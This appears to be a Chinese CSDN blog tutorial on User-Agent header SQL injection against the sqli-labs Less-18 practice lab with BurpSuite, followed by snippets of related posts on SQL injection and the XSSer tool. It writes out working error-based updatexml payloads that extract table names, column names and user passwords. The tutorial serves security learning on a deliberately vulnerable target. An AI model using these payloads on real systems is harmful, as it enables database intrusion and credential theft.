【SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)

已于 2022-07-01 03:47:49 修改
阅读量4.9k 收藏 20
点赞数 8
分类专栏: # 筑基07:WEB漏洞原理 文章标签: sql 安全 web安全
于 2022-02-21 15:35:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123026792
版权

目录

1 概述

  1. User-Agent:是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。用较为普通的一点来说,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。
  2. UA字符串在每次浏览器 HTTP 请求时发送到服务器!浏览器UA 字串的标准格式为: 浏览器标识 (操作系统标识; 加密等级标识; 浏览器语言) 渲染引擎标识 版本信息
  3. User-Agent注入:User-Agent 注入其原理也和平时的注入一样,只不过说我们是将提交的参数以 User-Agent 的方式提交,属于http头部注入的一种。
  4. 一般的注入我们是使用get或者post方式提交:
    1. get方式提交就是直接在网址后面加上需要注入的语句;
    2. post则是通过表单方式,
    3. get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。

2 实验简介

2.1 实验平台

  1. 靶机:CentOS7安装docker,利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
  2. 真实机:为了方便修改http头部信息,本实验利用BurpSuite来进行注入实验,BurpSuite的安装过程可以参考文章《BurpSuite简介及安装》。
  3. 靶机与真实机桥接到同一局域网中。

2.2 实验目标

  1. 获取网站后台数据库账号及密码。

3 实验过程

3.1 前戏

  1. 真实机打开BurpSuite,进入Proxy工具,打开自带浏览器,访问靶机sqli-labs的Less18,打开页面如下。
    在这里插入图片描述
  2. 该关卡模拟登录页面注入,先尝试Dumb账户登录,登录后页面显示如下:
    在这里插入图片描述
  3. 在BurpSuite工具的intercept界面开启 intercept is on,重新加载上一步的页面,让BurpSuite获取到请求,将请求右键发送到repeater工具,点击forward。
    在这里插入图片描述
  4. 在BurpSuite的Repeater工具中,我们可以看到刚刚发送过来的请求,点击发送,可以看到响应中有user agent 的信息,因此猜测该字段内容可以回显到页面上,可能存在注入。
    在这里插入图片描述

3.2 判断注入点及注入类型

  1. 正常流程应该是先判断能否在常规位置进行注入,实在没有的情况下再找http头部信息能否注入,本节实验省去了测试其他位置能否注入的过程,仅为演示如何进行user-agent注入。
  2. 回到repeater界面,对请求进行编辑,user-agent信息修改为test,测试响应是否能回显该处内容。可以看到正常显示。
    在这里插入图片描述
  3. 修改参数为test'时,系统出现错误提示,由此我们猜测是因为多了一个单引号引起引号未正常闭合的情况。与以往不同的时,这里的错误语句还出现了一串包括IP和账号在内的其他语句,我们可以猜测,系统将该语句拼接到我们注入参数后一并执行。
    在这里插入图片描述
  4. 修改参数为test' and '1'='1,程序正常运行,说明该参数为单引号闭合的字符型注入。
    在这里插入图片描述
  5. 结论:该参数注入信息会回显到响应中,是一个注入点,且该参数为为单引号闭合的字符型注入。

3.3 获取库名表名字段名字段内容

  1. 获取库名。修改参数为test' and updatexml(1,concat('~',database(),'~'),1) and '1'='1,此处在语句最后加上了一个恒等式,一方面是为了闭合后台语句的单引号,另一方面是为了保证当我们语句拼接如后台后不影响后续语句的运行,这是该闭合方式比采用#号等方式的高明之处。通过该参数,我们爆出了该网站所在数据库名。
    在这里插入图片描述
  2. 获取表名。修改cookie参数为test' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = database() ),'~'),1) and '1'='1,共爆出4个表名,其中users是我们所要的目标。
    在这里插入图片描述
  3. 获取字段名。修改参数为test' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name = 'users'),'~'),1) and '1'='1,响应如下,共爆出3个字段名。
    在这里插入图片描述
  4. 获取用户数量。考虑到updatexml()函数回显字符长度有限,先获取用户数量,再逐个获取用户名与密码。修改参数为test' and updatexml(1,concat('~',(select count(username) from users),'~'),1) and '1'='1,响应中错误提示如下,可知共有13个用户。
    在这里插入图片描述
  5. 获取第一个用户账号及密码。修改参数为test' and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) and '1'='1,响应中错误提示如下,可知第一个账号密码均为Dumb,剩余账号密码只需修改limit参数便可逐个取出。
    在这里插入图片描述

3.4 实验结果

  1. 实验成功爆出网站后台数据库账号及密码。
  2. 实验关键在于构建能够闭合引号的注入参数。

4 总结

  1. 了解user-agent的组成与作用;
  2. 掌握user-agent注入的方法。
Fighting_hawk
关注
专栏目录
Centos7.2 Apache根据User-Agent设置访问禁止
夏冬丶王阳旭
11-09 1319
Apache可以设置资源的访问限制,在配置文件里通过mod_authz_host模块设置限制,这是在apache,2.4版本及以后中才有的模块,在2.2版本,是通过Order,Allow,Deny指令来实现限制功能。 这里记录下apache 的设置: $ vim /etc/httpd/conf/httpd.conf (  修改apache配置文件 ) ----------------
SQLi-Labs 基于报错的SQL注入
shangMD01的博客
02-17 2503
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
burpsuitesqlmap配合,通过sql注入漏洞爆oracle当前用户
zhj9705的博客
07-15 313
注:--proxy=http://127.0.0.1:8080是为了burpsuite里面HTTP history可以看到记录,方便检查访问是正常的,后续为了性能,可以不要。3.点击有注入漏洞的历史记录,保存到文件zhj.txt。burpsuite_pro_v2023.6安装成功。4.编辑保存的文件zhj.txt,找到注入点,加入。..............等待成果。2.在浏览器里面操作,可看历史记录。sqlmap代码下载。
SQL注入useragent注入
studyphp123的博客
04-23 836
一、预备知识 二、实验目的 三、实验工具 浏览器、Burpsuite 四、实验环境 客户机一台 五、实验步骤 第一步:查看网页,显示的是访问者的 useragent 信息,所有可以通过 useragent 语句进行注入。 打开 http://www.any.com/sqli/Less-18/,手动设置代理为 127.0.0.1:8080 第二步:查看当前数据库名称,MySQL版本信息。 1)...
HTTP中User-Agent注入
weixin_53519320的博客
10-28 1818
HTTP中User-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTP中User-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
通过User-Agent进行SQL注入
richard1230的博客
10-30 600
通过User-Agent进行SQL注入声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
SQL User-Agent注入详解
永远是少年
08-18 1391
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLUser-Agent注入详解。 一、SQL User-Agent简介 二、SQL User-Agent靶场简介 三、SQL User-Agent注入实战
sql注入靶场.zip
06-24
实践中,你将学习如何识别注入点,构造适当的payload(payload是注入的恶意SQL代码),并利用工具如Burp Suite、SQLMap等自动化工具来帮助测试和利用这些漏洞。同时,你也会了解到防止SQL注入的最佳实践,如参数化...
SQL注入-SQLMAP进阶使用
xdjxi的博客
02-23 3076
实验原理 使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入注入时,可以利用--technique参数指定SQLMAP使用的探测技术,B表示布尔盲注,T表示时间盲注(延迟注入)﹐E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情
SQL注入-SQLMAP基础使用
xdjxi的博客
02-19 2232
实验目的 了解SQLMAP实验步骤的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-r参数的基本使用方法。 实验步骤 本实验的目标是:以SQLi-Labs 网站的Less-4为入口,利用SQLMAP实施自动化SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站Less-4。访问的URL为:http:/ / [靶机 IP]..
SQL注入-http头部注入
xdjxi的博客
02-18 559
实验目的 理解HTTP头部字段User-Agent,Referer,Cookie,X-Forwarded等的含义和作用,掌握HTTP头部注入的原理,方法和基本流程, 实验步骤 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-18/ 2 利用Burpsuite工具抓包 (1)启动 Burpsuite (2)设置Burpsuite代理服务端口 (3)开启Burpsuite代理拦截功能 4 设置火狐代理 ...
SQL注入User-Agent注入
m0_48520508的博客
07-14 1068
0x00漏洞信息 披露者:harisec 危害程度:高危 漏洞类型:sql注入 0x01漏洞介绍 通过访问: https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入 我没有从数据库中提取任何数据,我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操作相结合,将导致服务器响应不同的时间取决于算术运算的结果。 例如,将该值设置: Mozilla/5.0 (Windows NT 6.1; WOW64) App
sql注入进阶/user-agent/基于报错的注入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 1211
基于user-agent 和报错的盲注
User-Agent(UA)注入
qq_69100706的博客
07-30 298
在CTF(Capture The Flag)竞赛中,User-Agent(UA)注入是一种利用Web应用程序安全漏洞的攻击方式,特别是在应用程序基于User-Agent字符串来执行某些逻辑或数据库查询时。User-Agent注入通常涉及到在HTTP请求头的User-Agent字段中插入恶意SQL代码,以达到控制或操纵应用程序行为的目的。
SQL注入_1-6_user-agent注入
weixin_44110913的博客
12-08 1542
SQL注入_1-6_user-agent注入 一.概念 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示,但通过伪装 UA 可以绕过检测...
sql注入之cookie 注入user-agent注入
没有故事
02-27 445
BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入
基于User-Agent注入
最新发布
weixin_73049307的博客
08-28 718
User-Agent:是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。用较为普通的一点来说,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。这里的错误语句还出现了一串包括IP和账号在内的其他语句,我们可以猜测,系统将该语句拼接到我们注入参数后一并执行。爆出security数据库有emails,referers,uagents,users表,其中users表是我们需要的。爆出数据库名是security。
User Agent注入攻击及防御
weixin_33897722的博客
05-24 697
CloudFlare公司经常会收到客户询问为什么他们的一些请求会被CloudFlare WAF屏蔽。最近,一位客户就提出他不能理解为什么一个访问他主页简单的 GET 请求会被 WAF 屏蔽。 下面是被屏蔽的请求: GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,applicati...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值